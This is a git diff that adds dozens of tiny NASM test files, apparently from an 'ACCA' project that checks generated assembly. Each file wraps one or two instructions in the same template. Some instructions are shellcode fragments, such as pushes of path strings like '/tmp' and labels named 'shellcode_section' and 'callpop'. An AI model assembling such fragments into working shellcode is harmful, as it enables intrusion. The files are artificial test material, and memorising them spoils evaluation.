Errors/executables/GT_467.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_473.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_473.asm new file mode 100644 index 0000000000000000000000000000000000000000..f8698225e39d24ed76b8f2728749e2edfd2a0ff9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_473.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte [esi + 1], dl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_473.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_473.obj new file mode 100644 index 0000000000000000000000000000000000000000..20b5b335fde402d0a971c18419fa16a89c47f3da Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_473.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_476.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_476.asm new file mode 100644 index 0000000000000000000000000000000000000000..17c59ce6050811c8131d0787e5618baee9a758fb --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_476.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section .text + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_476.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_476.obj new file mode 100644 index 0000000000000000000000000000000000000000..d47bc5aa4b236c0c8293fb01084e505c2b1a9e91 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_476.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_477.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_477.asm new file mode 100644 index 0000000000000000000000000000000000000000..b294e31419d7a96de32c3ceef135b55c403f0bcf --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_477.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 15 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_477.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_477.obj new file mode 100644 index 0000000000000000000000000000000000000000..200b59ebd59fb8aad716fb04ae551a110a725b1c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_477.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_478.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_478.asm new file mode 100644 index 0000000000000000000000000000000000000000..be5d0da6a6bf0c20ada2c1d737c952bb59e0492b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_478.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_478.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_478.obj new file mode 100644 index 0000000000000000000000000000000000000000..9b4a9717e5e684081839ab9f18d9e7de688defad Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_478.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_480.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_480.asm new file mode 100644 index 0000000000000000000000000000000000000000..a92db5b91c4c044a34369641cbc11bc60efbb00d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_480.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea ecx, [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_480.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_480.obj new file mode 100644 index 0000000000000000000000000000000000000000..435cb8736adb8a8a61c01ce9c369a5f7688266ed Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_480.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_484.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_484.asm new file mode 100644 index 0000000000000000000000000000000000000000..f183aa96c9a920edc5a69ac94f848572e9ee0cdd --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_484.asm @@ -0,0 +1,13 @@ +section .data + +zero_reg equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea ecx, [zero_reg+117] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_484.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_484.obj new file mode 100644 index 0000000000000000000000000000000000000000..0c5f89abce18147120b0bc55e5ede9eba4d10e93 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_484.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_485.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_485.asm new file mode 100644 index 0000000000000000000000000000000000000000..ce1ef036ac7494a974ca34decf71c0a5807bcaee --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_485.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov dword [esp-0x24], 0x732f636f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_485.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_485.obj new file mode 100644 index 0000000000000000000000000000000000000000..8ea81199d5c757c1d4e63d8e1a29427f8abddf73 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_485.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_490.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_490.asm new file mode 100644 index 0000000000000000000000000000000000000000..e400b23dc3f5174d16312365deb7562dd09e2f0e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_490.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp eax, ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_490.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_490.obj new file mode 100644 index 0000000000000000000000000000000000000000..d563973781d065969ebb7f2a91b09251ab2eae6e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_490.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_491.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_491.asm new file mode 100644 index 0000000000000000000000000000000000000000..bae62b0f8bd7e7048d8dc4e972fff1b5d05fbf6a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_491.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section .text + _start: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_491.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_491.obj new file mode 100644 index 0000000000000000000000000000000000000000..f37687ecee1094acd02d44bc8d43aa49706ff188 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_491.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_492.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_492.asm new file mode 100644 index 0000000000000000000000000000000000000000..0bd80ba77f631e8efbcfa3c1526a5f446164b121 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_492.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + dec byte dl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_492.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_492.obj new file mode 100644 index 0000000000000000000000000000000000000000..d4b3c1ce3e23aa1b81dc15f45508c001c8375e90 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_492.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_493.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_493.asm new file mode 100644 index 0000000000000000000000000000000000000000..57073501c2c9fbb5d180bbf8c74695854ed38dbe --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_493.asm @@ -0,0 +1,13 @@ +section .data + +callpop equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp callpop + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_493.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_493.obj new file mode 100644 index 0000000000000000000000000000000000000000..e9133b8c3abff8c24e6404e936ec0ecea9de86bb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_493.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_494.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_494.asm new file mode 100644 index 0000000000000000000000000000000000000000..6d6694dd6a397e3c1dc76636a5e3dd8417a2ff1d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_494.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_494.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_494.obj new file mode 100644 index 0000000000000000000000000000000000000000..aa41ae5e43778e4ed59da5bf07aa9eccf5d68f18 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_494.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_498.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_498.asm new file mode 100644 index 0000000000000000000000000000000000000000..df6bc145fc686cb740204f1d4b6cbacc7bb6811b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_498.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0x5 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_498.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_498.obj new file mode 100644 index 0000000000000000000000000000000000000000..3880fb876dc07752a1a072607af8124ea679c73e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_498.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_500.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_500.asm new file mode 100644 index 0000000000000000000000000000000000000000..404a06dde1b6706aab6841e4007037006afd93df --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_500.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mul ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_500.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_500.obj new file mode 100644 index 0000000000000000000000000000000000000000..2426f726b9e1b9e569c2010cc539cd838ba44fb2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_500.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_508.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_508.asm new file mode 100644 index 0000000000000000000000000000000000000000..b9701104ad761701cf82bed4647011d18fa44041 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_508.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + neg eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_508.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_508.obj new file mode 100644 index 0000000000000000000000000000000000000000..b165e66a7ac08b8e34d1a618bd13035d1b5b215a Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_508.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_51.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_51.asm new file mode 100644 index 0000000000000000000000000000000000000000..c852e7ceaaa2fffab0c96f76be3df8bf6bdf572a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_51.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + inc ax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_51.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_51.obj new file mode 100644 index 0000000000000000000000000000000000000000..ef17358910c497ab1085b9b63c97d5655f73a237 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_51.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_511.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_511.asm new file mode 100644 index 0000000000000000000000000000000000000000..68fbc19c3bcf3f334aed9a69434126f1183d75fb --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_511.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x04020a0a + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_511.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_511.obj new file mode 100644 index 0000000000000000000000000000000000000000..6509f79cf38d1b4301fa49b84a28e7c5091eed40 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_511.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_513.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_513.asm new file mode 100644 index 0000000000000000000000000000000000000000..75a58c47517f2d81e785f6bf36256522f2fea2f0 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_513.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea ebx, [ebp+39] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_513.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_513.obj new file mode 100644 index 0000000000000000000000000000000000000000..a10113714989e5cf20caac8d0a775d4e5d7f117b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_513.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_518.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_518.asm new file mode 100644 index 0000000000000000000000000000000000000000..1298aaacb654918fe55190e4261bafff203fbfc3 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_518.asm @@ -0,0 +1,13 @@ +section .data + +shellcode_section equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp short shellcode_section + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_518.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_518.obj new file mode 100644 index 0000000000000000000000000000000000000000..239550b167f14e765ca2f305aea57c95289d2211 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_518.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_519.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_519.asm new file mode 100644 index 0000000000000000000000000000000000000000..22e5d98e0a0973ccc485109c66e6c2e734701e05 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_519.asm @@ -0,0 +1,13 @@ +section .data + +write equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + ja write + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_519.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_519.obj new file mode 100644 index 0000000000000000000000000000000000000000..eaf80742d9be0a44d38f42019aa10bed59938f99 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_519.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_52.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_52.asm new file mode 100644 index 0000000000000000000000000000000000000000..75e8f2762e5d55e50ee660317cad6078c2627262 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_52.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x65782e2f + push 0x706d742f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_52.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_52.obj new file mode 100644 index 0000000000000000000000000000000000000000..2ef56d43ddb65846b2b4c4994a4672ab308586c1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_52.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_522.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_522.asm new file mode 100644 index 0000000000000000000000000000000000000000..4db35e9a0f87c2e904b70b60b10b2c74ff60e55a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_522.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ecx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_522.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_522.obj new file mode 100644 index 0000000000000000000000000000000000000000..214b5f87444a31350b582a7c912e1f2872a153a9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_522.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_525.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_525.asm new file mode 100644 index 0000000000000000000000000000000000000000..010772365b2d351f15d4ef18675b5769a6e12073 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_525.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + pop ebx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_525.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_525.obj new file mode 100644 index 0000000000000000000000000000000000000000..adad0619dc4c3ddbef42af1541190c1392d6fe4f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_525.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_526.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_526.asm new file mode 100644 index 0000000000000000000000000000000000000000..4db35e9a0f87c2e904b70b60b10b2c74ff60e55a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_526.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ecx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_526.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_526.obj new file mode 100644 index 0000000000000000000000000000000000000000..126c582692f0dbffd56d79f8c5a3f08f38c269bd Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_526.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_527.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_527.asm new file mode 100644 index 0000000000000000000000000000000000000000..dce64f6b43d1931ba311a94e07cd27bd55cd0cea --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_527.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 0x50905090 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_527.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_527.obj new file mode 100644 index 0000000000000000000000000000000000000000..d4fa75e9c964cb5fd6f2af7dedc757f0240c559d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_527.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_531.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_531.asm new file mode 100644 index 0000000000000000000000000000000000000000..920f61a90d45e98f056962aae3052775d1c2ebae --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_531.asm @@ -0,0 +1,13 @@ +section .data + +nextchar equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp nextchar + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_531.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_531.obj new file mode 100644 index 0000000000000000000000000000000000000000..4d13c38b6b0fe3cb56c76a42e4f074dfdabfcdc6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_531.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_535.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_535.asm new file mode 100644 index 0000000000000000000000000000000000000000..d192d83320399470f4ff9ff0e30706fa0c5b6650 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_535.asm @@ -0,0 +1,14 @@ +section .data + +exit equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp eax,ebx + je exit + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_535.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_535.obj new file mode 100644 index 0000000000000000000000000000000000000000..14831f4765353b2a85ff9d22e81f3f5de4f4c8ef Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_535.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_541.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_541.asm new file mode 100644 index 0000000000000000000000000000000000000000..af9538dcddaa121f56997f1b8fe4060f3a23ad94 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_541.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + zero1b: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_541.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_541.obj new file mode 100644 index 0000000000000000000000000000000000000000..e968141e7ba75e07c4c8053347a9e11deded34c5 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_541.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_542.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_542.asm new file mode 100644 index 0000000000000000000000000000000000000000..6cbbdf3296b363d92bde62c8d80afb229afe0cee --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_542.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 65 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_542.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_542.obj new file mode 100644 index 0000000000000000000000000000000000000000..351991452702d9de90c5a7b8e253a010cb3639f2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE 